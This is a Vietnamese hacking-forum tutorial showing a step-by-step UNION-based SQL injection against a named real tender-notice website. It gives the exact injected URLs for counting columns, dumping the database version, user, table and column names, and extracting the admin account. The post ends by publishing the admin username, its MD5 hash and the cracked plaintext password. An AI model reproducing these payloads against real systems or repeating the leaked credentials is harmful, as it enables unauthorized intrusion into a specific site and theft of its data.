Dont forget read our Rules! Also anyone caught Sharing this content will be banned. By using this site you are agreeing to our rules so read them. Saying I did not know is simply not an excuse! You have been warned.
http://thongbaomoithau.com/thong-bao-moi-thau-15484 order by 1-- -.html
--> bình thường
Code:
http://thongbaomoithau.com/thong-bao-moi-thau-15484 order by 11-- -.html
--> lỗi
vậy chúng ta column lỗi cần tìm là 10 chúng ta bắt đầu union select nhé
Code:
http://thongbaomoithau.com/thong-bao-moi-thau-15484 UNION SELECT 1,2,3,4,5,6,7,8,9,10-- -.html
không thấy hiện tượng hay lỗi của column nào thử thêm dâu '-' xem sao
Code:
http://thongbaomoithau.com/thong-bao-moi-thau--15484 UNION SELECT 1,2,3,4,5,6,7,8,9,10-- -.html
vẫn không thấy gì nhỉ nhưng nếu chú ý một tý thì các bạn sẽ thấy số 7 bị lỗi ngay chỗ title ak =)) vậy ta bắt đâu get được rồi
get version ,user ,database
Code:
http://thongbaomoithau.com/thong-bao-moi-thau--15484 UNION SELECT 1,2,3,4,5,6,group_concat(version(),0x7c,user(),0x7c,database()),8,9,10-- -.html
5.5.23-log|moithau_admin@localhost|moithau_news
tiếp đến là get table_name
Code:
http://thongbaomoithau.com/thong-bao-moi-thau--15484 UNION SELECT 1,2,3,4,5,6,group_concat(table_name),8,9,10 from information_schema.tables where table_schema=database()-- -.html
articles,articles_info,ban_group,ban_source,categories,categories_multi,comments,linhvuc,linhvuc_multi,mpi_kehoachdauthau,mpi_moisotuyen,mpi_thongbaomoithau,newsletter,nguon_nhandan,poll,poll_ip,poll_result,properties,rating,session,session_detail,styles,sub_categories,sub_linhvuc,time_limit,topmenu,users,visitors
get column
Code:
http://thongbaomoithau.com/thong-bao-moi-thau--15484 UNION SELECT 1,2,3,4,5,6,group_concat(column_name),8,9,10 from information_schema.columns where table_schema=database() and table_name=0x7573657273-- -.html
get data
id,username,password,root,allowed
Code:
http://thongbaomoithau.com/thong-bao-moi-thau--15484 UNION SELECT 1,2,3,4,5,6,group_concat(username,0x7c,password),8,9,10 from users-- -.html
admin|fe743d8d97aa7dfc6c93ccdc2e749513
và cuối cùng ta được admin|fe743d8d97aa7dfc6c93ccdc2e749513 khi md5 ra thì pas là 1234568
---> admin/1234568
end tut
TUT by Notes.
nhưng nếu chú ý một tý thì các bạn sẽ thấy số 7 bị lỗi ngay chỗ title ak =)) vậy ta bắt đâu get được rồi
![[cXF] Icons in More options menu](/data/resource_icons/0/432.jpg?1730710877){kind=icon}
![Arabic Language Pack [vBulletin 6.0.0]](/data/resource_icons/0/431.jpg?1728563962){kind=icon}
![[cXF] Sticky Postbit](/data/resource_icons/0/429.jpg?1728039111){kind=icon}
